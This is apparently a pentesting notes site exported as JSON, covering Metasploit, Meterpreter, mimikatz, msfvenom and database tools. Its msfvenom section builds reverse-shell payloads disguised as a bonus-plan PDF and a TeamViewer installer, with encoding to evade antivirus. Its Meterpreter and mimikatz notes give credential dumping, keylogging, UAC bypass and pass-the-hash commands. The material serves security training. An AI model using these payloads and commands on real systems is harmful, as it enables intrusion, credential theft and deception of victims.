    =========================\n\nDatabase Backend Commands\n\n=========================\n\ndb_connect\u00a0 \u00a0 \u00a0 \u00a0 Connect to an existing data service\n\ndb_disconnect \u00a0 \u00a0 Disconnect from the current data service\n\ndb_export \u00a0 \u00a0 \u00a0 \u00a0 Export a file containing the contents of the database\nBefore closing the session, save a backup:\ndb_export -f xml backup.xml\n\ndb_import \u00a0 \u00a0 \u00a0 \u00a0 Import a scan result file (filetype will be auto-detected)\nFor instance: \ndb_import Target.xml\ndb_import Target.nmap\n\ndb_nmap \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Executes nmap and records the output automatically\n\nAfter that, we can query: \nhosts\n# The hosts command displays a database table automatically populated with the host addresses, hostnames, and other information we find about these during our scans and interactions. \nservices. \n# host -h # to see all commands with hosts \n\nservices\n# It contains a table with descriptions and information on services discovered during scans or interactions.\n# services -h # to see all commands with services \n\ncreds\n# The creds command allows you to visualize the credentials gathered during your interactions with the target host.\n# creds -h # to see all commands with creds \n\nloot\n# The loot command works in conjunction with the command above to offer you an at-a-glance list of owned services and users. The loot, in this case, refers to hash dumps from different system types, namely hashes, passwd, shadow, and more.\n# loot -h # to see all commands with loot \n\ndb_rebuild_cache\u00a0 Rebuilds the database-stored module cache (deprecated)\n\ndb_remove \u00a0 \u00a0 \u00a0 \u00a0 Remove the saved data service entry\n\ndb_save \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Save the current data service connection as the default to reconnect on startup\n\ndb_status \u00a0 \u00a0 \u00a0 \u00a0 Show the current data service status\n\nhosts \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 List all hosts in the database\n\nloot\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 List all loot in the database\n\nnotes \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 List all notes in the database\n\nservices\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 List all services in the database\n\nvulns \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 List all vulnerabilities in the database\n\nworkspace \u00a0 \u00a0 \u00a0 \u00a0 Switch between database \nworkspace         List workspaces\nworkspace -v      List workspaces verbosely\nworkspace [name]  Switch workspace\nworkspace -a [name] ...    Add workspace(s)\nworkspace -d [name] ...    Delete workspace(s)\nworkspace -D     Delete all workspaces\nworkspace -r     Rename workspace\nworkspace -h     Show this help information\n

    Cheat sheet:

    # Search modules\nsearch (mysearchitem> \ngrep meterpreter show payloads\ngrep -c meterpreter grep reverse_tcp show payloads\n\n# Search for exploit of service hfs 2.3 serve\nsearchsploit hfs 2.3\n\n#  launch msfconsole and run the reload_all command for the newly installed module to appear in the list\nreload_all\n\n\n# Use a module\u00a0\nuse <name of module (like exploit/cmd/linux/tcp_reverse) or number> \n\n# Show options of current module (Watch out, prompt is included)\nmsf exploit/cmd/linux/tcp_reverse> show options\u00a0\n\n# Configure an option (Watch out, prompt is included)\nmsf\u00a0exploit/cmd/linux/tcp_reverse> set <option> <value> \n\n# Configure an option as a constant during the msf session (Watch out, prompt is included)\nmsf exploit/cmd/linux/tcp_reverse> setg <option> <value> \n\n# Go back to the main msf prompt (Watch out, prompt is included)\nmsf\u00a0exploit/cmd/linux/tcp_reverse> back \n\n# View related information of the exploit (Watch out, prompt is included)\nmsf\u00a0 exploit/cmd/linux/tcp_reverse> info \n\n# View related payloads of the exploit (Watch out, prompt is included)\nmsf\u00a0 exploit/cmd/linux/tcp_reverse> show payloads \n\n# Set a payload for the exploit (Watch out, prompt is included)\nmsf\u00a0 exploit/cmd/linux/tcp_reverse> set payload <value> \n\n# Before we run an exploit-script, we can run a check to ensure the server is vulnerable (Note that no\nt every exploit in the Metasploit Framework supports the `check` function)\nmsf6 exploit(windows/smb/ms17_010_psexec) > check\n\n# Run the exploit (Watch out, prompt is included)\nmsf\u00a0 exploit/cmd/linux/tcp_reverse> run\u00a0 \n\n# Run the exploit (Watch out, prompt is included)\nmsf\u00a0 exploit/cmd/linux/tcp_reverse> exploit \n\n# Run an exploit as a job by typing exploit -j\nexploit -j\n\n# See all sessions (Watch out, prompt is included)\nmsf> sessions\n\n# Switch to session number n (Watch out, prompt is included)\nmsf> sessions -i <n>\u00a0 \n\n# Kill all sessions (Watch out, prompt is included)\nmsf> sessions -K\u00a0 \n

    To kill a session we don't use CTRL-C, because the port would be still in use. For that we have jobs

    +++++++++\njobs\n++++++++++\n    -K        Terminate all running jobs.\n    -P        Persist all running jobs on restart.\n    -S <opt>  Row search filter.\n    -h        Help banner.\n    -i <opt>  Lists detailed information about a running job.\n    -k <opt>  Terminate jobs by job ID and/or range.\n    -l        List all running jobs.\n    -p <opt>  Add persistence to job by job ID\n    -v        Print more detailed info.  Use with -i and -l\n
    ","tags":["pentesting"]},{"location":"metasploit/#databases","title":"Databases","text":"
    # Start PostgreSQL\nsudo systemctl start postgresql\n\n# Initiate a Database\nsudo msfdb init\n\n# Check status\nsudo msfdb status\n\n# Connect to the Initiated Database\nsudo msfdb run\n\n# Reinitiate the Database\n[!bash!]$ msfdb reinit\n[!bash!]$ cp /usr/share/metasploit-framework/config/database.yml ~/.msf4/\n[!bash!]$ sudo service postgresql restart\n[!bash!]$ msfconsole -q\nmsf6 > db_status\n
    ","tags":["pentesting"]},{"location":"metasploit/#plugins","title":"Plugins","text":"

    To start using a plugin, we will need to ensure it is installed in the correct directory on our machine.

    ls /usr/share/metasploit-framework/plugins\n

    If the plugin is found here, we can fire it up inside msfconsole. Example:

    load nessus\n

    To install new custom plugins not included in new updates of the distro, we can take the .rb file provided on the maker's page and place it in the folder at /usr/share/metasploit-framework/plugins with the proper permissions. Many people write many different plugins for the Metasploit framework:

    nMap (pre-installed) NexPose (pre-installed) Nessus (pre-installed) Mimikatz (pre-installed V.1) Stdapi (pre-installed) Railgun Priv Incognito (pre-installed) Darkoperator's

    ","tags":["pentesting"]},{"location":"metasploit/#meterpreter","title":"Meterpreter","text":"

    The Meterpreter payload is a specific type of multi-faceted payload that uses DLL injection to ensure the connection to the victim host is stable, hard to detect by simple checks, and persistent across reboots or system changes. Meterpreter resides completely in the memory of the remote host and leaves no traces on the hard drive, making it very difficult to detect with conventional forensic techniques.

    When having an active session on the victim machine, the best module to run a Meterpreter is s4u_persistence:

    use exploit/windows/local/s4u_persistence\n\nshow options\n\nsessions\u00a0\n
    ","tags":["pentesting"]},{"location":"metasploit/#meterpreter-commands","title":"meterpreter commands","text":"
    # view all available commands\nhelp \n\n# Obtain a shell. Exit to exit the shell\nshell\u00a0 \n\n# View information about the system\nsysinfo\n\n# View the id that meterpreter assigns to the machine\nmachine_id\n\n# Print the network configuration\nifconfig \n\n# check routing information\nroute \u00a0 \n\n# Download a file\ndownload /path/to/fileofinterest.txt /path/to/ourmachine/destinationfile.txt\n\n# Upload a file\nupload /path/from/source.txt /path/to//destinationfile.txt\n\n# Bypass the authentification. It takes you from normal user to admin\ngetsystem\n# If the operation fails because of priv_elevated_getsystem error message, then use the\u00a0 bypassuac module: use exploit/windows/local/bypassuac\n\n# View who you are\ngetuid  \n\n# View all running processes\nps\n\n# Migrate to a different process with more privileges\nsteal_token <PID>\n\n# View the process that we are\ngetpid\n\n# Dumps the contents of the SAM database\nhashdump      \n\n# Dumps ...\nlsa_dump_sam\n\n# Meterpreter LSA Secrets Dump\nlsa_dump_secrets\n\n# Enumerate the modules available at this meterpreter session\nuse -l \u00a0 \n\n# load a specific module\nuse <name of module>\u00a0 \n\n# View all processes run by the system. This allows us to choose one in order to migrate the process of our persistent connection in order to have one less suspicious.\u00a0\nps -U SYSTEM\u00a0 \n\n# Change to a process\nmigrate\u00a0 <pid>\u00a0 \u00a0 \u00a0 \u00a0 \nmigrate -N lsass.exe\n# -N \u00a0 Look for the lsass.exe process and migrate the process into that. We can do this to run the command: hashdump (we\u2019ll get hashes to use them with john the ripper or ophcrack). Also, we can choose a less suspicious process such as svhost.exe and migrate there.\n\n# Get a windows shell\nexecute -f cmd.exe -i -H\n\n# Display the host ARP cache\narp           \n\n# Display the current proxy configuration\nget proxy\n\n# Display interfaces\nifconfig       \n\n# Display the network connections\nnetstat       \n\n# Forward a local port to a remote service\nportfwd       \n\n# Resolve a set of hostnames on the target\nresolve       \n

    More commands

    msf6> help\n    Command        Description\n    -------        -----------\n    enumdesktops   List all accessible desktops and window stations\n    getdesktop     Get the current meterpreter desktop\n    idle time       Returns the number of seconds the remote user has been idle\n    keyboard_send  Send keystrokes\n    keyevent       Send key events\n    keyscan_dump   Dump the keystroke buffer\n    keyscan_start  Start capturing keystrokes\n    keyscan_stop   Stop capturing keystrokes\n    mouse          Send mouse events\n    screenshare    Watch the remote user's desktop in real-time\n    screenshot     Grab a screenshot of the interactive desktop\n    setdesktop     Change the meterpreters current desktop\n    uictl          Control some of the user interface components\n
    ","tags":["pentesting"]},{"location":"metasploit/#metasploit-modules","title":"metasploit modules","text":"

    Located at /usr/share/metasploit-framework/modules. They have the following structure:

    <No.> <type>/<os>/<service>/<name>\n794   exploit/windows/ftp/scriptftp_list\n

    If we do not want to use our web browser to search for a specific exploit within ExploitDB, we can use the CLI version, searchsploit.

    searchsploit nagios3\n

    How to download and install an exploit from exploitdb:

    # Search for it from website or using searchsploit and download it. It should have .rb extension\nsearchsploit nagios3\n\n# The default directory where all the modules, scripts, plugins, and `msfconsole` proprietary files are stored is `/usr/share/metasploit-framework`. The critical folders are also symlinked in our home and root folders in the hidden `~/.msf4/` location. \n# Make sure that our home folder .msf4 location has all the folder structure that the /usr/share/metasploit-framework/. If not, `mkdir` the appropriate folders so that the structure is the same as the original folder so that `msfconsole` can find the new modules.\n\n# After that, we will be proceeding with copying the .rb script directly into the primary location.\n
    ","tags":["pentesting"]},{"location":"metasploit/#auxiliaryscannersmbsmb_login","title":"auxiliary/scanner/smb/smb_login","text":"

    Use this to enumerate users and brute force passwords in a smb service.

    ","tags":["pentesting"]},{"location":"metasploit/#auxiliaryhttp_javascript_keylogger","title":"auxiliary/http_javascript_keylogger","text":"

    It creates the Javascript payload with a keylogger, which could be injected within the XSS vulnerable web page and automatically starts the listening server. To see how it works, set the DEMO option to true.

    ","tags":["pentesting"]},{"location":"metasploit/#postwindowsgatherhasdump","title":"post/windows/gather/hasdump","text":"

    Once you have a meterpreter session as system user, this module dumps all passwords.

    ","tags":["pentesting"]},{"location":"metasploit/#windowsgatherarp-scanner","title":"windows/gather/arp-scanner","text":"

    To enumerate IPs in a network interface

    ","tags":["pentesting"]},{"location":"metasploit/#windowsgathercredentialswindows_autologin","title":"windows/gather/credentials/windows_autologin","text":"

    This module extracts the plain-text Windows user login password in\u00a0 Registry. It exploits a Windows feature that Windows (2000 to 2008 R2) allows a user or third-party Windows Utility tools to configure User AutoLogin via plain-text password insertion in (Alt)DefaultPassword field in the registry location -\u00a0 HKLM\\Software\\Microsoft\\Windows NT\\WinLogon. This is readable by all\u00a0 users.

    ","tags":["pentesting"]},{"location":"metasploit/#postwindowsgatherwin_privs","title":"post/windows/gather/win_privs","text":"

    This module tells you the privileges you have on the exploited machine.\u00a0

    ","tags":["pentesting"]},{"location":"metasploit/#exploitwindowslocalbypassuac","title":"exploit/windows/local/bypassuac","text":"

    If getsystem command fails (in the meterpreter) because of a priv_elevated_getsystem error message, then use this module to bypass that restriction. You will get a new meterpreter session with the UAC policy disabled. Now you can run getsystem.use

    ","tags":["pentesting"]},{"location":"metasploit/#postmultimanageshell_to_meterpretersessions","title":"post/multi/manage/shell_to_meterpretersessions","text":"

    It upgrades your shell to a meterpreter

    ","tags":["pentesting"]},{"location":"metasploit/#postmultireconlocal_exploit_suggester","title":"post/multi/recon/local_exploit_suggester","text":"

    local exploit suggester module:

    post/multi/recon/local_exploit_suggester\n
    ","tags":["pentesting"]},{"location":"metasploit/#auxiliaryserversocks_proxy","title":"auxiliary/server/socks_proxy","text":"

    This module provides a SOCKS proxy server that uses the builtin Metasploit routing to relay connections.

    ","tags":["pentesting"]},{"location":"metasploit/#exploitwindowsfileformatadobe_pdf_embedded_exe","title":"exploit/windows/fileformat/adobe_pdf_embedded_exe","text":"

    And also exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs To include malware into an adobe pdf

    ","tags":["pentesting"]},{"location":"metasploit/#integration-of-metasploit-with-veil","title":"Integration of metasploit with veil","text":"

    One nice thing about veil is that it provides a metasploit RC file, meaning that in order to launch the multihandler you just need to run:

    msfconsole -r path/to/metasploitRCfile\n
    ","tags":["pentesting"]},{"location":"metasploit/#ipmi-information-discovery","title":"IPMI Information discovery","text":"

    See ipmi service on UDP/623. This module discovers host information through IPMI Channel Auth probes:

    use auxiliary/scanner/ipmi/ipmi_version\n\nshow actions ...actions... msf \nset ACTION < action-name > msf \nshow options \n# and set needed options\nrun\n
    ","tags":["pentesting"]},{"location":"metasploit/#pmi-20-rakp-remote-sha1-password-hash-retrieval","title":"PMI 2.0 RAKP Remote SHA1 Password Hash Retrieval","text":"

    This module identifies IPMI 2.0-compatible systems and attempts to retrieve the HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.

    use auxiliary/scanner/ipmi/ipmi_dumphashes\n\nshow actions\n\nset ACTION < action-name >\n\nshow options\n# set <options>\n\nrun\n
    ","tags":["pentesting"]},{"location":"metasploit/#the-http_javascript_keylogger","title":"The http_javascript_keylogger","text":"

    This modules runs a web server that demonstrates keystroke logging through JavaScript. The DEMO option can be set to enable a page that demonstrates this technique. To use this module with an existing web page, simply add a script source tag pointing to the URL of this service ending in the .js extension. For example, if URIPATH is set to \"test\", the following URL will load this script into the calling site: http://server:port/test/anything.js

    use auxiliary/server/capture/http_javascript_keylogger\n
    ","tags":["pentesting"]},{"location":"mimikatz/","title":"mimikatz","text":"

    mimikatz is a tool made in C .

    It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

    Kiwi module in a meterpreter in metasploit is an adaptation of mimikatz.

    ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"mimikatz/#no-installation-portable","title":"No installation, portable","text":"

    Download from github repo: https://github.com/gentilkiwi/mimikatz.

    ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"mimikatz/#basic-usage","title":"Basic usage","text":"
    # Impersonate as NT Authority/SYSTEM (having permissions for it).\ntoken::elevate\n\n# List users and hashes of the machine\nlsadump::sam\n\n# Enable debug mode for our user\nprivilege::debug\n\n# List users logged in the machine and still in memory\nsekurlsa::logonPasswords full\n\n# Pass The Hash attack in windows:\n# 1. Run mimikatz\nmimikatz.exe privilege::debug \"sekurlsa::pth /user:<username> /rc4:<NTLM hash> /domain:<DOMAIN> /run:<Command>\" exit\n# sekurlsa::pth is a module that allows us to perform a Pass the Hash attack by starting a process using the hash of the user's password\n# /run:<Command>: For example /run:cmd.exe\n# 2. After that, we canuse cmd.exe to execute commands in the user's context. \n
    ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"mitm-relay/","title":"mitm_relay","text":"

    Hackish way to intercept and modify non-HTTP protocols through Burp & others with support for SSL and STARTTLS interception

    This script is a very simple, quick and easy way to MiTM any arbitrary protocol through existing traffic interception software such as Burp Proxy or\u00a0Proxenet. It can be particularly useful for thick clients security assessments. It saves you from the pain of having to configure specific setup to intercept exotic protocols, or protocols that can't be easily intercepted. TCP and UDP are supported.

    It's \"hackish\" in the way that it was specifically designed to use interception and modification capabilities of existing proxies, but for arbitrary protocols. In order to achieve that, each client request and server response is wrapped into the body of a HTTP POST request, and sent to a local dummy \"echo-back\" web server via the proxy. Therefore, the HTTP responses or headers that you will see in your intercepting proxy are meaningless and can be disregarded. Yet the dummy web server is necessary in order for the interception tool to get the data back and feed it back to the tool.

    • The requests from client to server will appear as a request to a URL containing \"CLIENT_REQUEST\"
    • The responses from server to client will appear as a request to a URL containing \"SERVER_RESPONSE\"

    This way, it is completely asynchronous. Meaning that if the server sends responses in successive packets it won't be a problem.

    To intercept only server responses, configure your interception rules like so:

    \"Match and Replace\" rules can be used. However, using other Burp features such as repeater, intruder or scanner is pointless. That would only target the dummy webserver used to echo the data back.

    The normal request traffic flow during typical usage would be as below:

    ","tags":["windows","thick applications"]},{"location":"mitm-relay/#installation","title":"Installation","text":"

    Download from GitHub - jrmdev/mitm_relay: Hackish way to intercept and modify non-HTTP protocols through Burp & others.

    ","tags":["windows","thick applications"]},{"location":"mitm-relay/#requirements","title":"Requirements","text":"

    1. mitm_relay requires python 3. Also to make sure that it doesn't have a conflict with pip module, we can use version 3.7.6. Download from: https://www.python.org/ftp/python/3.7.6/python-3.7.6-amd64.exe and install it. Once installed, restart the system.

    2. Also, we can run in some problems like not having some modules installed, To get them installed, we would need to download getpip.py from https://github.com/amandaguglieri/python/blob/main/getpip.py

    After installing pip, to install a module, run:

    python -m pip install <nameofmodule>\n
    ","tags":["windows","thick applications"]},{"location":"mmc-console/","title":"Microsoft Management Console (MMC)","text":"

    You use Microsoft Management Console (MMC) to create, save and open administrative tools, called consoles, which manage the hardware, software, and network components of your Microsoft Windows operating system.

    We can also open the MMC Console from a non-domain joined computer using the following command syntax:

    runas /netonly /user:Domain_Name\\Domain_USER mmc\n

    Now, you will have the MMC interface:

    We can add any of the RSAT snap-ins and enumerate the target domain in the context of the target user sally.jones in the freightlogistics.local domain. After adding the snap-ins, we will get an error message that the \"specified domain either does not exist or could not be contacted.\" From here, we have to right-click on the Active Directory Users and Computers snap-in (or any other chosen snap-in) and choose Change Domain.

    Type the target domain into the Change domain dialogue box, here freightlogistics.local. From here, we can now freely enumerate the domain using any of the AD RSAT snapins.

    ","tags":["active directory","ldap","windows"]},{"location":"mobsf/","title":"Mobile Security Framework - MobSF","text":"

    Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. MobSF supports mobile app binaries (APK, XAPK, IPA & APPX) along with others

    ","tags":["mobile pentesting"]},{"location":"mobsf/#installation","title":"Installation","text":"
    1. Install Git using below provided command in terminal
    sudo apt-get install git\n
    1. Install Python 3.8/3.9 using below provided command
    sudo apt-get install python3.8**\n
    1. Install latest version of JDK

    Download from: https://www.oracle.com/java/technologies/javase-java-archive-javase6-downloads.html

    Then:

    chmod +x jdk-6u45-linux-x64.bin\nsh jdk-6u45-linux-x64.bin      \n

    1. Install the required dependencies using below provided command
    sudo apt install python3-dev python3-venv python3-pip build-essential libffi-dev libssl-dev libxml2-dev libxslt1-dev libjpeg62-turbo-dev zlib1g-dev wkhtmltopdf\n
    1. Download MobSF using below provided command
    git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git\n

    Setup MobSF using command:

    sudo ./setup.sh\n

    Run!

    ./run.sh 127.0.0.1:8000\n\n# Note: we can use any port number instead of **8000**, but it must be available\n

    Access the MobSF web interface in browser using the URL: http://127.0.0.1:8000

    ","tags":["mobile pentesting"]},{"location":"mongo/","title":"Mongo","text":"

    By default, mongo uses TCP ports 27017-27018.

    ","tags":["database","database","NoSQL"]},{"location":"mongo/#to-connect-to-a-mongodb","title":"To connect to a MongoDB","text":"

    By default mongo does not require password. Admin is a common mongo database default admin user.

    mongo $ip\nmongo <HOST>:<PORT>\nmongo <HOST>:<PORT>/<DB>\nmongo <database> -u <username> -p '<password>'\n

    A collection is a group of documents in the database.

    ","tags":["database","database","NoSQL"]},{"location":"mongo/#basic-usage","title":"Basic usage","text":"
    # Enter in mongodb application\nmongo\n\n# See help\nhelp\n\n# Display databases\nshow dbs\n\n# Select a database\nuse <db>\n\n# Display collections in a database\nshow collections\n\n# Dump a collection\ndb.<collection>.find()\n\n# Return the number of records of the collection\ndb.<collection>.count() \n\n# Find in current db the username admin\ndb.current.find({\"username\":\"admin\"}) \n\n# Find in city collection all cities that matches the criteria (= MA) and return the count\ndb.city.find({\"city\":\"MA\"}).count() \n\n# How many cities of state \u201cIndiana\u201d have population greater than 15000 in collection \u201ccity\u201d in database \u201ccity\u201d?\ndb.city.find({$and:[{\"state\":\"IN\"}, {\"pop\":{$gt:15000}}]}).count()\n\n\n####################\n# Operators\n####################\n# Greater than: $gt\ndb.city.find({\"population\":{$gt:150000}}).count() \n\n# And operator: $and\ndb.city.find({$and:[{population:{$gt:150000}},{\"state\":\"FLORIDA\"}]})\n\n# Or operator: $or\ndb.city.find({$or:[{population:{$lt:1000}},{\"state\":\"FLORIDA\"}]})\n\n# Not equal operator: $ne\n# equal operator: $e\n\n# Additionally, you can use regex: Cities that starts with HA: \ndb.city.find({\"city\":{$regex:\"^HA.*\"}})\n\n# What is the name of 101st city in collection \u201ccity\u201d when sorted in ascending order according to \u201ccity\u201d in database \u201ccity\u201d?\ndb.city.find().sort({\"city\":1}).skip(100).limit(1)\n\n#####################\n# Operations\n#####################\n# Perform an average on an aggregate of documents\ndb.city.aggregate({\"$group\":{\"_id\":null, avg:{$avg:{\"$population\"}} }})\n\n\n# We can dump the contents of the documents present in the flag collection by using the db.collection.find() command. Let's replace the collection name flag in the command and also use pretty() in order to receive the output in a beautified format.\n
    ","tags":["database","database","NoSQL"]},{"location":"moodlescan/","title":"moodlescan","text":"

    my eval: I'm not sure about how accurate it is. I was working on the Goldeneye1 machine from vulnhub and moodlescan identied the moodle version as 2.2.2 when in reality is 2.2.3.

    ","tags":["pentesting","web pentesting","cms","moodle"]},{"location":"moodlescan/#installation","title":"Installation","text":"

    Requirements: Install Python 3 and Install the package python3-pip

    git clone https://github.com/inc0d3/moodlescan\ncd moodlescan\npip install -r requirements.txt\n
    ","tags":["pentesting","web pentesting","cms","moodle"]},{"location":"moodlescan/#basic-commands","title":"Basic commands","text":"
    python moodlescan.py -u [URL]\n\n\n#Options\n#       -u [URL]    : URL with the target, the moodle to scan\n#       -a      : Update the database of vulnerabilities to latest version\n#       -r      : Enable HTTP requests with random user-agent\n#       -k      : Ignore SSL Certificate\n#       Proxy configuration\n#\n#       -p [URL]    : URL of proxy server (http)\n#       -b [user]   : User for authenticate to proxy server\n#       -c [password]   : Password for authenticate to proxt server\n#       -d [protocol]  : Protocol of authentication: basic or ntlm\n
    ","tags":["pentesting","web pentesting","cms","moodle"]},{"location":"msfvenom/","title":"msfvenom","text":"

    MSFVenom is the successor of MSFPayload and MSFEncode, two stand-alone scripts that used to work in conjunction with msfconsole to provide users with highly customizable and hard-to-detect payloads for their exploits.

    You can generate a webshell by using\u00a0 msfvenom

    # List payloads\nmsfvenom --list payloads | grep x64 | grep linux | grep reverse\u00a0\u00a0\n\n# list all the available payloads\nmsfvenom -l payloads  \n

    Also msfvenom can use metasploit payloads under \u201ccmd/unix\u201d to generate one-liner bind or reverse shells. List options with:

    msfvenom -l payloads | grep \"cmd/unix\" | awk '{print $1}'\n
    ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#some-flags","title":"Some flags","text":"
    # -b, or --bad-chars: The list of characters to avoid example: '0'\n
    ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#staged-payload","title":"Staged payload","text":"
    # Example of a linux staged payload\nmsfvenom -p linux/x64/shell/reverse_tcp lhost=192.66.166.2 lport=443 -f elf -o newfile\n\n# Example of a windows staged payload\nmsfvenom -p windows/x64/meterpreter/bind_tcp lhost=10.10.14.72 lport=1234 -f aspx -o lal\n

    After that

    chmod +x newfile\u00a0\n

    When creating a staged payload, you will need to use a metasploit handler (exploit/multi/handler) in order to receive the shell connection as only metasploit contains proper logic that will send the rest of the payload to the connector . In that case, the metasploit payload has to be the same one as the MSFVenom one.

    ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#stagedless-payload","title":"Stagedless payload","text":"

    A stage less payload is a standalone program that does not need anything aditional (no metasploit connection), just the netcat listener on the computer.

    # Example of a windows stageless payload\nmsfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe\n

    If the AV was disabled all the user would need to do is double click on the file to execute and we would have a shell session.

    ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#crafting-a-dll-file-with-a-webshell","title":"crafting a DLL file with a webshell","text":"

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IPAttacker> LPORT=<4444> -a x86 -f dll > SECUR32.dll\n# -p: for the chosen payload\n# -a: architecture in the victim machine/application\n# -f: format for the output file\n
    More about DLL highjacking in thick client applications.

    ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#crafting-a-exe-file-with-shikata-ga-nai-encoder","title":"crafting a .exe file with Shikata Ga Nai encoder","text":"
    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port -e x86/shikata_ga_nai -f exe -o ./TeamViewerInstall.exe\n\n# -e: chosen encoder \n

    Shikata Ga Nai encoder will be most likely detected by AV and IDS/IPS. One better option would be to try running it through multiple iterations of the same Encoding scheme:

    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exe\n

    But, still, we could be getting detected.

    ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#module-msf-virustotal","title":"Module msf-virustotal","text":"

    Alternatively, Metasploit offers a tool called msf-virustotal that we can use with an API key to analyze our payloads. However, this requires free registration on VirusTotal.

    msf-virustotal -k <API key> -f TeamViewerInstall.exe\n
    ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#packers","title":"Packers","text":"

    The term Packer refers to the result of an executable compression process where the payload is packed together with an executable program and with the decompression code in one single file. When run, the decompression code returns the backdoored executable to its original state, allowing for yet another layer of protection against file scanning mechanisms on target hosts. This process takes place transparently for the compressed executable to be run the same way as the original executable while retaining all of the original functionality. In addition, msfvenom provides the ability to compress and change the file structure of a backdoored executable and encrypt the underlying process structure.

    A list of popular packer software:

    UPX packer The Enigma Protector MPRESS Alternate EXE Packer ExeStealth Morphine MEW Themida

    If we want to learn more about packers, please check out the PolyPack project.

    ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#mitical-attacks","title":"Mitical attacks","text":"Vulnerability Description MS08-067 MS08-067 was a critical patch pushed out to many different Windows revisions due to an SMB flaw. This flaw made it extremely easy to infiltrate a Windows host. It was so efficient that the Conficker worm was using it to infect every vulnerable host it came across. Even Stuxnet took advantage of this vulnerability. Eternal Blue MS17-010 is an exploit leaked in the Shadow Brokers dump from the NSA. This exploit was most notably used in the WannaCry ransomware and NotPetya cyber attacks. This attack took advantage of a flaw in the SMB v1 protocol allowing for code execution. EternalBlue is believed to have infected upwards of 200,000 hosts just in 2017 and is still a common way to find access into a vulnerable Windows host. PrintNightmare A remote code execution vulnerability in the Windows Print Spooler. With valid credentials for that host or a low privilege shell, you can install a printer, add a driver that runs for you, and grants you system-level access to the host. This vulnerability has been ravaging companies through 2021. 0xdf wrote an awesome post on it here. BlueKeep CVE 2019-0708 is a vulnerability in Microsoft's RDP protocol that allows for Remote Code Execution. This vulnerability took advantage of a miss-called channel to gain code execution, affecting every Windows revision from Windows 2000 to Server 2008 R2. Sigred CVE 2020-1350 utilized a flaw in how DNS reads SIG resource records. It is a bit more complicated than the other exploits on this list, but if done correctly, it will give the attacker Domain Admin privileges since it will affect the domain's DNS server which is commonly the primary Domain Controller. SeriousSam CVE 2021-36924 exploits an issue with the way Windows handles permission on the C:\\Windows\\system32\\config folder. Before fixing the issue, non-elevated users have access to the SAM database, among other files. This is not a huge issue since the files can't be accessed while in use by the pc, but this gets dangerous when looking at volume shadow copy backups. These same privilege mistakes exist on the backup files as well, allowing an attacker to read the SAM database, dumping credentials. Zerologon CVE 2020-1472 is a critical vulnerability that exploits a cryptographic flaw in Microsoft\u2019s Active Directory Netlogon Remote Protocol (MS-NRPC). It allows users to log on to servers using NT LAN Manager (NTLM) and even send account changes via the protocol. The attack can be a bit complex, but it is trivial to execute since an attacker would have to make around 256 guesses at a computer account password before finding what they need. This can happen in a matter of a few seconds.","tags":["pentesting","terminal","shells"]},{"location":"mssql/","title":"MSSQL - Microsoft SQL Server","text":"

    Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications\u2014which may run either on the same computer or on another computer across a network. Wikipedia.

    By default, MSSQL uses ports\u00a0TCP/1433\u00a0and\u00a0UDP/1434. \u00a0However, when MSSQL operates in a \"hidden\" mode, it uses the\u00a0TCP/2433\u00a0port.

    ","tags":["database","cheat sheet"]},{"location":"mssql/#mssql-databases","title":"MSSQL Databases","text":"

    MSSQL has default system databases that can help us understand the structure of all the databases that may be hosted on a target server.

    Default System Database Description master Tracks all system information for an SQL server instance model Template database that acts as a structure for every new database created. Any setting changed in the model database will be reflected in any new database created after changes to the model database msdb The SQL Server Agent uses this database to schedule jobs & alerts tempdb Stores temporary objects resource Read-only database containing system objects included with SQL server

    Table source: System Databases Microsoft Doc and HTB Academy

    ","tags":["database","cheat sheet"]},{"location":"mssql/#authentication-mechanisms","title":"Authentication Mechanisms","text":"

    MSSQL supports two authentication modes, which means that users can be created in Windows or the SQL Server:

    • Windows authentication mode: This is the default, often referred to as integrated security because the SQL Server security model is tightly integrated with Windows/Active Directory. Specific Windows user and group accounts are trusted to log in to SQL Server. Windows users who have already been authenticated do not have to present additional credentials.
    • Mixed mode: Mixed mode supports authentication by Windows/Active Directory accounts and SQL Server. Username and password pairs are maintained within SQL Server.
    ","tags":["database","cheat sheet"]},{"location":"mssql/#mssql-clients","title":"MSSQL Clients","text":"
    • SQL Server Management Studio (SSMS) comes as a feature that can be installed with the MSSQL install package or can be downloaded & installed separately
    • mssql-cli
    • SQL Server PowerShell|
    • HediSQL
    • SQLPro
    • Impacket's mssqlclient.py To locate it:
